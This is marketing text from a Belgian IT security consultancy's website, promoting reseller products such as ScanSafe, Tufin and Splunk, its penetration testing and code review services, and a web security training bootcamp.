Download the PDF about ScanSafe Web Malware scanning for more information.

Please consult one of our representatives for more information or a quote.

Anywhere+

The number of employees who work outside the traditional office is rapidly increasing and perhaps surprisingly now constitutes the majority for many businesses.

Roaming employees now connect to the Internet from a variety of locations, from their homes and client offices to airport lounges and hotel hotspots. However, the benefits of employees working outside the office are tempered by some obvious problems, chief of which are lower levels of security and increased vulnerability to Web malware.

IT administrators have little or no control over roaming employees' access to inappropriate Web content. This situation is not helped by the fact that roaming employees are five times more likely to access inappropriate content on the road than in the office.

Even more worrying is that roaming employees only use VPNs 17% of their browsing time. How are they controlled and protected the other 83% of the time?

Anywhere+ is ScanSafe's SaaS Web Security for real-time protection and policy enforcement for your roaming employees. With Anywhere+ it is finally possible to protect your roaming employees wherever they are working.

Unlike traditional approaches which rely on software and appliances, Anywhere+ is delivered as a service for complete security, reduced complexity and simplified user management. Anywhere+ removes the performance issues and bandwidth congestion associated with backhauling Web traffic over the corporate VPN, so your security perimeter is now anywhere you want it to be.

All Web traffic flowing to ScanSafe's upstream datacenters is SSL encrypted leading to improved security over public networks. With Anywhere+, log information is securely in your hands, not on a file on the local PC. Reporting data is automatically and continuously aggregated across internal corporate users and roaming users.

Policy changes can be implemented immediately - no need to wait for client software to try to update itself on its own schedule. Policy changes are active within seconds, globally.

Anywhere+ is deployed through a lightweight driver (7MB) that requires minimal memory (less than 16MB RAM) to authenticate and direct your external client Web traffic to ScanSafe's scanning infrastructure.

Download the PDF about ScanSafe Anywhere+ for more information.

Please consult one of our representatives for more information or a quote.

Scansafe Web Filtering

As the amount of time spent browsing the Internet continues to rise, the problems associated with providing unmonitored and unregulated Internet access also increase.

Now dynamic and user generated content makes up a large percentage of content being accessed. Therefore traditional methods of filtering based purely on web site categorization can no longer be considered sufficient to maintain web usage policy and prevent inappropriate content from entering the network.

Scansafe Web Filtering empowers organisations of all sizes to implement an effective Web policy to help limit legal liability, enhance user productivity and improve network performance by preventing inappropriate, bandwidth intensive or non-business related content from entering the network.

Scansafe Web Filtering enables businesses to implement granular control for both inbound and outbound communications while realizing cost savings of up to 40% by eliminating the need to purchase, deploy and maintain hardware required for on-premise solutions.

With this solution you have complete control over how end users access content on the Internet by providing intuitive tools to create, enforce and monitor effective inbound and outbound web policy. For example it helps you to prevent leaks of confidential or personal data to the Web.

Scansafe Web Filtering integrates seamlessly with existing Active Directory infrastructure, allowing administrators to easily create different access policies to suit different areas of the organization. You also have a web-based interface for centralized management and reporting.

Download the PDF about ScanSafe Web Filtering for more information.

Please consult one of our representatives for more information or a quote.

Web Security

ZION SECURITY cooperates with Scansafe to protect your users against web based threats.

ScanSafe is the pioneer and largest global provider of SaaS (Software as a Service) Web Security, ensuring a safe and productive Internet environment for businesses.

ScanSafe solutions keep malware off corporate networks and allow businesses to control and secure the use of the Web. As a SaaS solution, ScanSafe eliminates the burden of purchasing and maintaining infrastructure in-house, significantly lowering the total cost of ownership.

Powered by its proactive, multilayered Outbreak Intelligence^TM threat detection technology, ScanSafe processes billions of Web requests and millions of blocks each month for customers in over 100 countries.

Discover now the different possibilites and solutions like Web Filtering, Web Malware scanning and Anywhere+ (which protects your remote workers).

 Web Anti-Malware

Planting malware is evaluating into a growing and concerning problem. Over the last two years there was a 600% increase in web based attacks. Hackers target legitimate web sites to plant malware. At this moment more than 1 million pages are infected per month. Several reports claim that planting malware on target web sites was already the number one security attack for online criminals last year (2008).  

Web malware infections can have a serious impact on business revenue. Google, Firefox, Internet Explorer and anti-virus companies blacklist infected websites. On top of that, your website suffers damage concerning brand and reputation by infecting visitors.

Our Web Anti-Malware (WAM) solution, part of ZION VERIFIED, consists of two services: Blacklist monitoring and Malware monitoring.

  ZION VERIFIED

What are organizations doing at this moment to protect their critical web applications?

Organizations rely on a third party to execute penetration tests. This is a manual test performed by security experts. The penetration test detects all kind of leaks and vulnerabilities in the application or infrastructure. The third party delivers a list with vulnerabilities that have to be solved by the organization itself.

Unfortunately, at this point the penetration test stops and in most cases the list of vulnerabilities will not be followed up by the third party...

Over the last couple years we investigated that practically every (medium or large) organization has difficulties to solve the vulnerabilities and leaks the penetration test had detected.

However website security is more than just detecting vulnerabilities and leaks. It's about scanning, detecting, fixing and retesting the vulnerabilities in your website. It's a never ending security lifecycle that has to be monitored 24/24, 7/7.

Discover here how ZION VERIFIED helps organizations to manage their web security risks.

Security testing

The ideal situation for the customer and ZION SECURITY is that security tests are executed during the development phase, together with functional testing and stress testing.

The main purpose of security testing is to identify the existence of security controls like authentication, authorization and input validation.

For example the risks for authentication and authorization include access to the system by an unauthorized user, theft of usernames or passwords and password cracking/dictionary attacks, and ability to bypass authentication or authentication logging.

All attacks and tests are executed manually. ZION SECURITY only uses automated tools for specific functions like brute-forcing ports, passwords, identifiers,...

Security tests are mostly focused on one single application and our security experts follow a certain methodology:

1. Our security experts test and scan the application for vulnerabilities and leaks
2. We insert reports and bugs in the customer's bugtracking system
3. Our security experts retest the application
4. Final report that will be discussed at length with the responsible person regarding these matters in the company

In a first meeting, the methodology will be discussed and can be adapted on customer demand.

Files

ZION SECURITY Services - Security Testing.pdf

 Interested?

Ask here for more information or an offer without obligation.

Quick Scan

ZION SECURITY developed on customer demand a specific solution called Quick Scan.

When choosing a penetration test, the customer has the possibility to test and scan the entire infrastructure and applications for leaks and vulnerabilities.

The difference between a penetration test and Quick Scan is that a Quick Scan is a lighter version of the penetration test. Here the scope and time are limited. The customer indicates in a first meeting which application or infrastructure has to be tested for vulnerabilities and leaks.

Upon completion of the Quick Scan the customer will receive a final report containing a list of vulnerabilities and leaks. The report also contains a plan of operation indicating the priority, possible cost and the time of implementation.

This report can be discussed with the responsible person regarding these matters in the company.

Our Quick Scan is ideal for organisations that want to have a global idea about the security level of their infrastructure and applications.

A Quick Scan can also be customized, for example an extensive scan of one specific application.

   Interested?

Ask here for more information or an offer without obligation.

Code review

ZION SECURITY is expert in executing code reviews, manually or automated. A code review is required when the objective is to find all vulnerabilities and backdoors in a (web) application. Often we complement code review with security testing to verify the exploitability of the identified vulnerability.

Code review also allows to give in depth countermeasures to secure the application and to train developers to prevent future holes.

During most code reviews we have identified security issues in the business logic of the application, which would not have been found using a penetration test approach.

Files

ZION SECURITY Services - Code Review.pdf

Want to know more?

For more information or a specific quote adapted to your situation, please feel free to contact one of our representatives.

 WhiteHat

ZION VERIFIED is a unique service consisting of a combination of software (WhiteHat Sentinel) and manual testing. ZION SECURITY is the first enterprise in Europe that has the right to use this software.

WhiteHat Security is a leading American provider of website security services. It was founded in August 2001 by a team led by Jeremiah Grossman, a security industry veteran and former Yahoo! information security officer. Jeremiah founded the company to provide a comprehensive solution to the growing problem of website security.

WhiteHat Sentinel is the most accurate, complete and cost-effective website vulnerability management solution available on the market. WhiteHat Sentinel is built on a Software-as-a-Service (SaaS) platform designed from the ground up to scale massively, support the largest enterprises and offer the most compelling business efficiencies, lowering your overall cost of ownership.

This software has been especially developed to test and scan (custom) web applications, what makes it unique in the market.

As you might know, there are currently 24 broad classes of attacks. And, since every web application is unique, we're dealing with known classes of vulnerabilities in completely unknown code. The challenge is to figure out in each unique website, exactly where and how these vulnerabilities are implemented in the code. That's where WhiteHat Sentinel differentiates from other products.

Most of medium and large organizations in America, with critical web applications, are already using WhiteHat.

 ZION VERIFIED: Different modules

We developed, on customer demand, different modules:

ZION VERIFIED Light allows you to scan and retest your applications solely using the automatic software of WhiteHat.

ZION VERIFIED Business allows you to scan and retest your applications with WhiteHat in combination with manual tests performed by our security experts

ZION VERIFIED PCI: The difference with ZION VERIFIED Business is that we add an "introduction to web application security" training to satisfy PCI compliancy and we can generate a PCI report.

The course provides an overview of the fundamental principles of website security and meets PCI-DSS requirement 6.5b which covers developer training on secure coding techniques. All participants will receive a certificate confirming course completion.

The ZION VERIFIED PCI report delivers both an overview and an in-depth look into the PCI compliance of each website under management. For each vulnerability class, the report details how the vulnerability is exploited, gives protection advice and lists links to reference information. Open vulnerabilities of each class on the customer's website are also listed.

Contact one of our experts for more information or a quote without obligation.

 What is ZION VERIFIED?

ZION VERIFIED closes the gap between detecting, fixing and retesting vulnerabilities in your web applications. 

ZION VERIFIED scans your web applications at regular intervals. We find your vulnerabilities, propose a solution to your development team and prove that they were resolved by verifying the solution.

Our service consists of a combination of software and manual tests. The software comes from WhiteHat, an American web application security company. This software has been especially developed to test and scan (custom) web applications, what makes it unique in the market.

Aside from using the software to test your applications, our security experts also perform manual tests on your critical applications.

FOR A FIXED AMOUNT EACH YEAR!

ZION VERIFIED handles your web applications vulnerability management for you. However, it also puts you in the driver's seat of multitude tasks that put you in charge.

 You can:

• Request to schedule a new scan for an application.
• Request a manual retest of a vulnerability that you already addressed.
• Send a general support question about software security to ZION SECURITY.
• Receive vulnerability reports in HTML format. As ZION VERIFIED identifies vulnerabilities, it classifies them according to the 24 Web Application Security Consortium (WASC) vulnerability classes and the OWASP Top 10.
• ... 

ZION VERIFIED scans for business logic flaws and vulnerabilities. It tests for example the OWASP Top 10 and the WASC 24 classes. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are. ZION VERIFIED is always up to date with the newest vulnerabilities.

ZION SECURITY is the first European company that can offer this new and innovative service toward his customers!

Tufin: How to get it?

For a live demo or a quote, please feel free to contact one of our representatives.

Our security experts can give a demonstration of Tufin at your office. This will take approximately one hour.

Some screenshots

Click on the pictures for a more detailed view.

Screenshot 1: Object comparison

Screenshot 2: Rule and Object usage analysis

Screenshot 3: Firewall rule change report

Screenshot 4: Firewall OS Monitoring

Screenshot 5: Business ownership change report

Tufin: your benefits

Your key benefits using Tufin SecureTrack are:

• Tufin monitors firewall policy changes, reports them in real-time and maintains a comprehensive, accurate audit trail for full accountability.


• Analysis and clean-up of complex rule bases and objects. Tufin for example locates unused rules so that they can be removed, thereby eliminating potential security holes and improve performance. It also enables administrators to organize the rule base according to priority to improve performance and to reduce the need for additional hardware.


• Powerful simulation and risk analysis to identify potential security risks, ensure compliance with organizational security standards, and prevent service interruptions.


• Comprehensive monitoring of critical firewall operating system components and server performance indicators to prevent service interruptions and enable effective auditing.


• Best practice audit: Tufin compares current security policy to the industry's best practices to identify potential errors or areas for improvement.


• Integration with change management, ticketing systems.


• Intuitive, graphical views of firewall policies, rule bases and configuration changes for Check Point, Cisco, Juniper, Fortinet, F5 and Bluecoat firewalls.

What is Tufin?

Tufin SecureTrack is the leading Firewall Operations Management Solution.  

It's capable of gathering detailed information from a very large number of firewalls and its real time policy monitoring and analysis capabilities make it an ideal partner for change management teams.

Tufin SecureTrack is the most comprehensive solution available for managing and auditing firewalls. With support for all major firewall vendors (Checkpoint, Cisco, Juniper, BlueCoat, F5, Fortinet), SecureTrack provides a cohesive, unified view of all of firewalls - along with many other security devices - on the network.

SecureTrack is essential to ensuring that a corporate security policy is being implemented consistently in an environment with multiple rule bases, geographies, and teams.

With Tufin SecureTrack, you will increase productivity of the whole organization by better understanding how to manage and audit your firewalls.  

Splunk: How to get it?

For a live demo or a quote, please feel free to contact one of our representatives. Our security experts can setup a demo at your office. This will take no longer than 30 minutes.

You can also download a free, limited edition of Splunk. Just click here.

Splunk: References

More than 350.000 people worldwide already are using Splunk, including over 1.000 licensed customers. Some examples are Cisco, Dow Jones, LinkedIn, Motorola, MySpace, NASA, T-Mobile, Verisign, Verizon, Visa and Vodafone.

All customers testify that they are improving operations, investigating security incidents in record time and meeting compliance requirements at lower cost, using Splunk.

Splunk: Your benefit

Your whole IT team will be smarter as they share saved searches, tag events, hosts and configurations with useful information and build their own dashboards with interactive charts, graphs, tables and more.

By making it possible for humans to interact with terabytes of IT data, Splunk is fundamentally changing how organizations manage, secure and audit increasingly complex computing environments.

Splunk: Enables to secure your IT infrastructure

Splunk gives you the opportunity to investigate security incidents in record time by searching and analyzing all your security-relevant data from one place.

It helps security analysts to investigate incidents in minutes instead of hours or days by searching and analyzing all security relevant data from one place - catching attackers and malicious insiders who had previously gone undetected.

Splunk improves your security posture by quickly filtering out false positives and visualize security information for situational awareness.

The figure below indicates how Splunk enables you to secure your IT infrastructure.

1. Index all the data you need to monitor and investigate any type of threat - OS, IDS, firewall, network device, DNS, DHCP, remote access and AAA logs, proxy, web, custom application logs and more.


2. Security analysts and incident response teams will initially adopt Splunk to investigate IDS and SIEM alerts, investigate activity for flagged users and investigate access to sensitive data.


3. As they go, they'll enrich the raw data by tagging events they encounter as significant; normalizing heterogeneous data formats on-the-fly by extracting and naming fields, such as usernames, and identifying and naming events, such as successful logins.


4. Automatically monitor for known bad events, and use sophisticated correlation via search, to find known risk patterns such brute force attacks, data leakage and even application-level fraud.


5. Security managers will take advantage of Splunk's reporting to get a birds-eye view of security-relevant events such as firewall reporting, IDS rule violations and login activity. Use Splunk proactively to search for attack footprints in response to reports of new zero-day attacks, review trends in logins and other activity to uncover suspicious patterns and anomalies to find previously undetected attacks.

What makes Splunk so different from other solutions?

Splunk is unique because of 6 reasons:

• Splunk indexes any data, every word of every event from any IT source in real time, without using databases, expensive connectors, custom parsers or proprietary consoles. It allows you to search for any term or grouping of words whole or fractional, in a google manner.


• Splunk lets you interact with your search results immediately. Zoom in and out on a time line of your results to quickly reveal trends, spikes and anomalies. Using statistics, graphs and other practical tools you can find in no time the needle in the haystack.


• Splunk is immensely scalable. Architecturally, Splunk can maintain online data access for years if desired using nothing more than a file system (no DB).


• Splunk does not use a Database and as such is schema-less.  All data is stored in an open format (gzip) and can be signed to ensure no one has tampered with the files.


• Splunk operates across all business units as IT search is not owned by a particular business unit. Splunk is a unifying tool that provides a predictable and common view into all log data across your organization.


• Splunk is build on a platform from which the customer can freely and with ease add on their own customization. So the customer has the ability to modify, if needed.

What is Splunk?

Splunk is IT search. For that reason Splunk is often called "Google for IT".

With Splunk you can instantly figure out what is happening anywhere in your infrastructure by making use of all the data being logged within your data center.

Only Splunk enables you to search, analyze, monitor and report on data from any application, server or network device in real time to troubleshoot application outages, investigate security incidents, meet compliance requirements, and more, in minutes instead of hours or days.

Logs, configurations, messages, traps and alerts, scripts, code, metrics and more. If a machine can generate it - Splunk can eat it !!!

Now you can search across terabytes of data in seconds to find that needle in the haystack, analyze hidden trends and instantly create reports to summarize activities. Schedule searches to alert on specific conditions and automate the delivery of reports.

Introduction to Summer Bootcamp

We're back! ZION UNIVERSITY organizes for the second year in a row a summer bootcamp about web application security. During 3 days, attendees learn to think as a hacker. Our security experts teach about the newest hacker tools and hacker techniques to exploit vulnerabilities in web applications.  

The target of this bootcamp is to create awareness and to get a clear view on the way hackers think. This enables you to do a basic evaluation of your applications on your own and to write secure code. Armed with this information, you will have the knowledge to better protect web applications against external threats like hackers and malware.

Last year we were honoured to welcome some respected organizations like for example Colruyt and Portima.

Program

The Bootcamp will be organized the first week of July and August 2010 during the first three days of these weeks.

We start the week with an introduction to the actual problems concerning web application security. We discuss the OWASP initiative, statistics and many more. We continue the day with an open discussion on how to implement a secure development lifecycle within your organization. To conclude we discuss the most common vulnerabilities in web 1.0 and web 2.0. Full program
On Tuesday we organize several hands-on sessions about tools like Wikto, Crowbar, Suru,... to test web applications. After the lunch break we proceed with WebGoat, a Java web application that contains lessons with specific vulnerabilities like SAX Injection, web services SQL Injection, Cross-site-scripting, .... Full program
On the third and final day we explain how a web application firewall can protect you against the most common vulnerabilities. We discuss how you have to install, configure and monitor such a specific firewall. Using WebGoat we trace vulnerabilities in a fictive website and we show in real-time how a web application firewall prevents leaks from being exploited.  Full program

Who should attend?

This summer bootcamp mainly focuses on three categories of profiles, namely developers, security officers and IT managers.

Registration

The number of registrations is limited because our experts desire to work with small groups to create interactivity. You are not obligated to register for the three days. In other words it is possible to only register for the days you are interested in.

Please contact one of our representatives for more information or prices by phone (016/29.79.22), by mail (sales@zionsecurity.com) or by filling in a contact form through our website.

Products

Mollom HTTPModule

Whitepapers

• Presentation by Erwin Geirnaert at Infosecurity 2010
• Web hacking database bi-annual report
• Whitepaper: Analysis of an unknown malicious JavaScript
• Whitepaper: 10 tips voor een veilige eID implementatie
• Whitepaper: Selecting a secure open source content management system
• Case Study: Using Splunk for web application forensics
• Whitepaper: An overview of the current situation in the web application security landscape
• ZEND & OWASP ESAPI for PHP

ZION SECURITY in the press

Erwin Geirnaert appears on a regular base with a column in IT professional:

• Crisis als dankbaar excuus" 25 februari 2009
• Staat u ook op de lijst van gehackte sites?" 2 februari 2009
• "2009: het begin van de securitycrisis?" 14 januari 2009
• "Hoeveel zijn uw kredietkaartgegevens waard?" 6 januari 2009
• "U belt toch ook 'gratis'?" 19 november 2008

ZION SECURITY in De Standaard (on page 8).

Interview with Erwin Geirnaert in Trends: "Buying on the Internet: the booby traps"

Interview with Erwin Geirnaert and Jessica Nieuwdorp in Het Nieuwsblad, De Gentenaar and Het Volk. Online version available here (in Dutch).

ZION SECURITY in Smart Business Strategies

Interview with Erwin Geirnaert in Jobat

ZION in Ondernemers

ZION SECURITY in Business ICT

ZION SECURITY in Zelfstandig Ondernemen

ZION SECURITY in De Vlaamse Ondernemer

Interview with Erwin Geirnaert in De Tijd

We are experts in IT and security

Our consultants are experts in IT and security and have years of expercience executing projects for large, medium and small enterprises. Thanks to our broad experience in IT we offer pragmatic solutions.

Founders

ZION SECURITY was founded in 2005 by Erwin Geirnaert and Jessica Nieuwdorp.

Erwin Geirnaert is a Master of Science in Computer Science from the University of Ghent, Belgium. He is specialized in information security. He obtained different international certifications like Certified Information Systems Security Professional from ISC² and Certified Information Systems Auditor from ISACA. He is a respected authority in the field of application security and has years of experience in securing e-business architectures. 

Colleagues

Johan Braeken graduated as professional bachelor in Applied Computer Science at the Provincial College in Hasselt. After a career at multiple Belgian consultancy companies such as Ubizen, Johan chose to join the ZION SECURITY -team. Johan has more than 10 years experience in information security and is a renowned Linux expert. He has various certificates and is specialized in networksecurity and firewalls. Johan has experience in penetration testing and audit, such as verifying whether systems are configured correctly according to the standards. Johan gives security training together with Erwin within ZION UNIVERSITY.

Christophe Joos graduated in 2008 as a Master in Economic Sciences. He specialized in Marketing Management. After a short period of employment at Toyota, he joined ZION SECURITY as head of Marketing and Sales. 

Maarten Aerts graduated in 2008 as a Professional Bachelor in Applied Computer Science. He worked at Ordina as a Junior Sharepoint Consultant. Maarten was hired by ZION SECURITY as a Software Security Expert.

Vasco

Vasco is a Belgian leader in the market of strong authentication. Strong authentication helps securing the access to applications. A password is a not enough. Users are obliged to authenticate using a device, a Digipass, that will generate a single-use or one-tim password. With this password, access through a VPN can be setup secure as well as access to a webmail environment and web applications.

For more information please visit www.vasco.com or contact one of our representatives.

Tufin

Most organizations have difficulties to manage and audit their increasingly complex firewall environments. Administrators today need a comprehensive management solution for monitoring all changes performed throughout their firewall policies.

Companies have come to understand the business impact of network security and to demand a high level of transparency and accountability. To meet these requirements, organizations need the ability to perform periodical audits to ensure compliance with three different levels of security directives: regulatory requirements, corporate policy and industry best practices.

Does your organisation has the capability to audit, manage and monitor your complex firewall environment?

Looking for a tool that can help you doing this? Discover now Tufin SecureTrack!

Fortify

Fortify's Business Software Assurance products and services protect companies from the threats posed by security flaws in business-critical software applications.

Combining deep application security expertise with extensive software development experience, Fortify Software has defined the market with award-winning products that assure software security from development to production. Today, Fortify Software fortifies the software for the most demanding customer deployments, including the world’s largest, most varied code bases.

For more information visit www.fortify.com

ZION SECURITY selected Fortify for its static analysis tool. Static analysis of source code allows to execute a code review in an automated way, reducing manual analysis of C, C++, ASP.NET, Java, ... Security vulnerabilities are reported in a dashboard which will be verified by ZION SECURITY application security experts.

Fortify 360	Fortify 360 Fortify 360 identifies, prioritizes and helps you eliminate security vulnerabilities in software. It delivers: Vulnerability Detection: Detect vulnerabilities with static and dynamic analysis Collaborative Remediation: Fix vulnerabilities in a shared workspace Reporting and Governance: Manage and report on the process Threat Intelligence: Stay ahead with cutting edge research

F5

F5 solutions provide an advanced web application firewall along with comprehensive web application security. This combination significantly reduces the risk of damage to intellectual property, data, and web applications. With F5, you get a complete solution that eliminates the need for multiple appliances, lowers maintenance and management costs, and increases the confidentiality, availability, and integrity of your applications and processes.

For more information please visit www.f5.com or contact one of our representatives.

ZION SECURITY offers managed application security services (MASS) with the F5 Big-IP Application Security Manager (ASM), a secure and accurate web application firewall.

Download a whitepaper from F5 about web application firewalls

app-firewall-wp.pdf

Breach Security

Breach Security, a leader in the emerging market for Intelligent Web Application Security, addresses today's Web security needs with next-generation Web protection solutions.

Breach's products address both enterprise and governmental needs using a unique combination of detection and prevention technology to secure business-critical Web applications from targeted cyber attacks.

ZION SECURITY partnered with Breach Security for the open-source product ModSecurity. ModSecurity is the creation of Ivan Ristic, one of the experts in web application firewalls. Our security experts can install and configure ModSecurity in your datacenter.

We also use ModSecurity for the Basic version of ZION SECURED WAMAF, a unique concept to protect your web site against attacks from hackers and malware.

Contact one of our representatives for more information about ModSecurity or ZION SECURED WAMAF.

WhiteHat Security

WhiteHat Security was founded in August 2001 by a team led by Jeremiah Grossman, a security industry veteran and former Yahoo! information security officer. Jeremiah founded the company to provide a comprehensive solution to the growing problem of website security.

ZION SECURITY is partner of WhiteHat Sec for the innovative web application scanning software called WhiteHat Sentinel.

WhiteHat Sentinel is built on a Software-as-a-Service (SaaS) platform designed from the ground up to scale massively, support the largest enterprises and offer the most compelling business efficiencies, lowering your overall cost of ownership.

We integrated WhiteHat Sentinel in our revolutionary service ZION VERIFIED. With ZION VERIFIED, you pay a single annual fee and you assess your applications as often as you like.

Click here for more information about ZION VERIFIED.

For more information about WhiteHat Security, please visit www.whitehatsec.com.

Splunk

Can you imagine the chaos using the Internet without a search engine?

Well, your datacenter is just as chaotic. Do you know at this moment what's happening in your IT infrastructure? How do you find the valuable information you need burled in all the logs? How do you detect the IT data your infrastructure generates every day?

Splunk has an answer on these specific questions.